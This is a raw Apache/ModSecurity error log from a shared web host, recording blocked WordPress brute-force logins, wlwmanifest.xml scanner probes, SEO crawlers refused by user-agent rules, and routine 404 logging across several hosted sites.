[Tue May 26 19:47:27.613157 2026] [security2:error] [pid 77894:tid 77895] [remote 212.224.100.2:63324] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 2.100.224.212.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWrdzomEhVPuJoD1MZ0eAAAXgA"]
[Tue May 26 19:47:27.736949 2026] [security2:error] [pid 77894:tid 78107] [client 85.204.70.118:48390] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dgcni.org.in"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahWrdzomEhVPuJoD1MZ0iQAAAFM"]
[Tue May 26 19:47:28.037730 2026] [security2:error] [pid 77894:tid 78033] [client 85.204.70.118:48398] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dgcni.org.in"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWreDomEhVPuJoD1MZ0kQAAAAk"]
[Tue May 26 19:47:28.329873 2026] [security2:error] [pid 77894:tid 78060] [client 85.204.70.118:48410] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dgcni.org.in"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWreDomEhVPuJoD1MZ0mQAAACQ"]
[Tue May 26 19:47:28.407367 2026] [security2:error] [pid 77894:tid 77896] [remote 212.224.100.2:63324] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 2.100.224.212.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWreDomEhVPuJoD1MZ0mgAACgE"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:47:28.617835 2026] [security2:error] [pid 77894:tid 78113] [client 85.204.70.118:48418] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dgcni.org.in"] [uri "/2018/wp-includes/wlwmanifest.xml"] [unique_id "ahWreDomEhVPuJoD1MZ0pQAAAFk"]
[Tue May 26 19:47:28.913933 2026] [security2:error] [pid 77894:tid 78056] [client 85.204.70.118:48420] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dgcni.org.in"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahWreDomEhVPuJoD1MZ0sAAAACA"]
[Tue May 26 19:47:29.211856 2026] [security2:error] [pid 77894:tid 78097] [client 85.204.70.118:48424] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dgcni.org.in"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahWreTomEhVPuJoD1MZ0sQAAAEk"]
[Tue May 26 19:47:29.503904 2026] [security2:error] [pid 77894:tid 78149] [client 85.204.70.118:48440] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dgcni.org.in"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWreTomEhVPuJoD1MZ0vwAAAH0"]
[Tue May 26 19:47:29.795745 2026] [security2:error] [pid 77894:tid 78109] [client 85.204.70.118:48448] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dgcni.org.in"] [uri "/media/wp-includes/wlwmanifest.xml"] [unique_id "ahWreTomEhVPuJoD1MZ0xQAAAFU"]
[Tue May 26 19:47:30.088324 2026] [security2:error] [pid 77894:tid 78060] [client 85.204.70.118:48458] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dgcni.org.in"] [uri "/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahWrejomEhVPuJoD1MZ01gAAACQ"]
[Tue May 26 19:47:30.375360 2026] [security2:error] [pid 77894:tid 78139] [client 85.204.70.118:48472] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dgcni.org.in"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWrejomEhVPuJoD1MZ04gAAAHM"]
[Tue May 26 19:47:30.674497 2026] [security2:error] [pid 77894:tid 78097] [client 85.204.70.118:48476] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dgcni.org.in"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahWrejomEhVPuJoD1MZ07wAAAEk"]
[Tue May 26 19:47:30.750349 2026] [security2:error] [pid 77894:tid 78115] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrejomEhVPuJoD1MZ04QAAAFs"]
[Tue May 26 19:47:31.593351 2026] [security2:error] [pid 77894:tid 78035] [client 14.174.14.90:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrezomEhVPuJoD1MZ0-wAAAAs"]
[Tue May 26 19:47:33.714504 2026] [security2:error] [pid 77894:tid 78137] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrfTomEhVPuJoD1MZ1VQAAAHE"]
[Tue May 26 19:47:36.284247 2026] [security2:error] [pid 77894:tid 77949] [remote 54.39.6.72:36034] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "paqys.com"] [uri "/robots.txt"] [unique_id "ahWrgDomEhVPuJoD1MZ1xQAANjY"]
[Tue May 26 19:47:36.284443 2026] [security2:error] [pid 77894:tid 78078] [client 54.39.6.72:36034] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "paqys.com"] [uri "/robots.txt"] [unique_id "ahWrgDomEhVPuJoD1MZ1xQAANjY"]
[Tue May 26 19:47:36.344754 2026] [security2:error] [pid 77894:tid 78028] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrfzomEhVPuJoD1MZ1sgAAAAQ"]
[Tue May 26 19:47:37.728278 2026] [security2:error] [pid 77894:tid 77953] [remote 51.222.95.56:46226] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "paqys.com"] [uri "/"] [unique_id "ahWrgTomEhVPuJoD1MZ18gAAOzo"]
[Tue May 26 19:47:37.728520 2026] [security2:error] [pid 77894:tid 78083] [client 51.222.95.56:46226] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "paqys.com"] [uri "/"] [unique_id "ahWrgTomEhVPuJoD1MZ18gAAOzo"]
[Tue May 26 19:47:37.982486 2026] [security2:error] [pid 77894:tid 78075] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrgTomEhVPuJoD1MZ17AAAADM"]
[Tue May 26 19:47:40.227756 2026] [fcgid:warn] [pid 77894:tid 78063] (70014)End of file found: [client 66.132.195.108:18294] mod_fcgid: can't get data from http client
[Tue May 26 19:47:41.323072 2026] [security2:error] [pid 77894:tid 78150] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrhDomEhVPuJoD1MZ2bgAAAH4"]
[Tue May 26 19:47:43.402176 2026] [security2:error] [pid 77894:tid 78047] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrhjomEhVPuJoD1MZ2sgAAABc"]
[Tue May 26 19:47:44.110311 2026] [security2:error] [pid 77894:tid 78088] [client 114.119.148.237:57415] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahWriDomEhVPuJoD1MZ25QAAAEA"], referer: http://haddingtonwines.com/cart?remove_item=1731592aca5fb4d789c4119c65c10b4b
[Tue May 26 19:47:45.015841 2026] [security2:error] [pid 77894:tid 78054] [client 196.244.71.212:51072] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWriDomEhVPuJoD1MZ26wAAAB4"], referer: https://www.cagmedya.com/
[Tue May 26 19:47:46.259564 2026] [security2:error] [pid 77894:tid 77990] [remote 92.222.104.207:60314] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.shirdisaibabatemple.org"] [uri "/robots.txt"] [unique_id "ahWrijomEhVPuJoD1MZ3LAAAOl8"]
[Tue May 26 19:47:46.259785 2026] [security2:error] [pid 77894:tid 78082] [client 92.222.104.207:60314] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.shirdisaibabatemple.org"] [uri "/robots.txt"] [unique_id "ahWrijomEhVPuJoD1MZ3LAAAOl8"]
[Tue May 26 19:47:46.362741 2026] [security2:error] [pid 77894:tid 78106] [client 45.157.112.169:47831] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "trichycityag.svijaykumar.in"] [uri "/index.htm"] [unique_id "ahWrijomEhVPuJoD1MZ3MwAAAFI"]
[Tue May 26 19:47:46.470015 2026] [security2:error] [pid 77894:tid 78122] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrijomEhVPuJoD1MZ3JQAAAGI"]
[Tue May 26 19:47:47.762368 2026] [security2:error] [pid 77894:tid 77930] [remote 142.44.233.91:44094] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.shirdisaibabatemple.org"] [uri "/"] [unique_id "ahWrizomEhVPuJoD1MZ3XAAAcSM"]
[Tue May 26 19:47:47.762587 2026] [security2:error] [pid 77894:tid 78137] [client 142.44.233.91:44094] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.shirdisaibabatemple.org"] [uri "/"] [unique_id "ahWrizomEhVPuJoD1MZ3XAAAcSM"]
[Tue May 26 19:47:48.667442 2026] [security2:error] [pid 77894:tid 78113] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrjDomEhVPuJoD1MZ3dAAAAFk"]
[Tue May 26 19:47:51.157157 2026] [security2:error] [pid 77894:tid 78118] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrjjomEhVPuJoD1MZ3wAAAAF4"]
[Tue May 26 19:47:51.655156 2026] [fcgid:warn] [pid 77894:tid 78096] (70014)End of file found: [client 66.132.172.220:29632] mod_fcgid: can't get data from http client
[Tue May 26 19:47:54.262600 2026] [security2:error] [pid 77894:tid 78126] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrkTomEhVPuJoD1MZ4LAAAAGY"]
[Tue May 26 19:47:54.326607 2026] [security2:error] [pid 77894:tid 78014] [remote 173.212.233.81:60120] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 81.233.212.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWrkjomEhVPuJoD1MZ4MQAAN3c"]
[Tue May 26 19:47:56.726438 2026] [security2:error] [pid 77894:tid 77916] [remote 45.79.189.31:31746] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.189.79.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWrlDomEhVPuJoD1MZ4jAAAbxU"]
[Tue May 26 19:47:56.783670 2026] [security2:error] [pid 77894:tid 78140] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrlDomEhVPuJoD1MZ4iwAAAHQ"]
[Tue May 26 19:47:57.940836 2026] [security2:error] [pid 77894:tid 78078] [client 14.183.170.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrlTomEhVPuJoD1MZ4sAAAADY"]
[Tue May 26 19:47:59.511125 2026] [security2:error] [pid 77894:tid 78099] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrlzomEhVPuJoD1MZ46QAAAEs"]
[Tue May 26 19:47:59.607183 2026] [security2:error] [pid 77894:tid 78116] [client 66.132.172.220:36004] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.deeigo.com"] [uri "/public/index.php"] [unique_id "ahWrlzomEhVPuJoD1MZ49gAAAFw"]
[Tue May 26 19:48:00.566479 2026] [security2:error] [pid 77894:tid 78030] [client 85.208.96.200:46854] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/2026-04-04/"] [unique_id "ahWrmDomEhVPuJoD1MZ5EwAAAAY"]
[Tue May 26 19:48:00.566620 2026] [security2:error] [pid 77894:tid 78030] [client 85.208.96.200:46854] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/2026-04-04/"] [unique_id "ahWrmDomEhVPuJoD1MZ5EwAAAAY"]
[Tue May 26 19:48:02.188933 2026] [security2:error] [pid 77894:tid 78086] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrmTomEhVPuJoD1MZ5MQAAAD4"]
[Tue May 26 19:48:04.660285 2026] [security2:error] [pid 77894:tid 78113] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrnDomEhVPuJoD1MZ5eQAAAFk"]
[Tue May 26 19:48:04.702476 2026] [security2:error] [pid 77894:tid 78060] [client 78.47.98.55:1332] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahWrnDomEhVPuJoD1MZ5hAAAACQ"], referer: https://thegoodsporting.com
[Tue May 26 19:48:04.990547 2026] [security2:error] [pid 77894:tid 77935] [remote 144.126.139.83:55220] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.139.126.144.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWrnDomEhVPuJoD1MZ5hQAASCg"]
[Tue May 26 19:48:06.386950 2026] [security2:error] [pid 77894:tid 77945] [remote 144.126.139.83:55220] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.139.126.144.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWrnjomEhVPuJoD1MZ5twAATjI"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:48:07.199910 2026] [security2:error] [pid 77894:tid 78143] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrnjomEhVPuJoD1MZ5zwAAAHc"]
[Tue May 26 19:48:07.646690 2026] [security2:error] [pid 77894:tid 78104] [client 46.105.232.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWrnzomEhVPuJoD1MZ54gAAAFA"], referer: http://www.anujtradingco.com/blog-2/blog-boxed-bigtext/
[Tue May 26 19:48:07.646981 2026] [security2:error] [pid 77894:tid 78030] [client 46.105.232.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWrnzomEhVPuJoD1MZ55AAAAAY"], referer: http://www.anujtradingco.com/shop-2/shop-carousel/
[Tue May 26 19:48:08.254377 2026] [security2:error] [pid 77894:tid 78132] [client 138.229.107.186:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWroDomEhVPuJoD1MZ5-QAAAGw"], referer: https://www.anujtradingco.com/
[Tue May 26 19:48:09.235787 2026] [security2:error] [pid 77894:tid 78087] [client 46.105.232.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWroTomEhVPuJoD1MZ6FQAAAD8"], referer: http://www.anujtradingco.com/shop-2/shop-carousel/
[Tue May 26 19:48:09.245692 2026] [security2:error] [pid 77894:tid 78088] [client 46.105.232.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWroTomEhVPuJoD1MZ6GAAAAEA"], referer: http://www.anujtradingco.com/blog-2/blog-boxed-bigtext/
[Tue May 26 19:48:09.335145 2026] [security2:error] [pid 77894:tid 78144] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWroDomEhVPuJoD1MZ6CwAAAHg"]
[Tue May 26 19:48:09.901280 2026] [security2:error] [pid 77894:tid 78034] [client 138.229.107.186:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWroTomEhVPuJoD1MZ6KAAAAAo"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1230522&moderation-hash=3045c8d525c2db48bd4eb670ab172339
[Tue May 26 19:48:10.191226 2026] [security2:error] [pid 77894:tid 77970] [remote 74.7.241.58:47874] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWrojomEhVPuJoD1MZ6NQAATEs"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/demo/wp-content/plugins/contact-form-7
[Tue May 26 19:48:12.602610 2026] [security2:error] [pid 77894:tid 78112] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrpDomEhVPuJoD1MZ6dAAAAFg"]
[Tue May 26 19:48:12.737999 2026] [security2:error] [pid 77894:tid 78113] [client 64.233.173.169:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahWrpDomEhVPuJoD1MZ6dwAAAFk"]
[Tue May 26 19:48:14.085960 2026] [security2:error] [pid 77894:tid 78094] [client 64.233.173.169:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahWrpTomEhVPuJoD1MZ6pwAAAEY"]
[Tue May 26 19:48:14.118102 2026] [security2:error] [pid 77894:tid 77982] [remote 65.2.90.30:60892] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.90.2.65.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWrpTomEhVPuJoD1MZ6qAAAb1c"]
[Tue May 26 19:48:14.631307 2026] [security2:error] [pid 77894:tid 78080] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWrpjomEhVPuJoD1MZ6tQAAADg"]
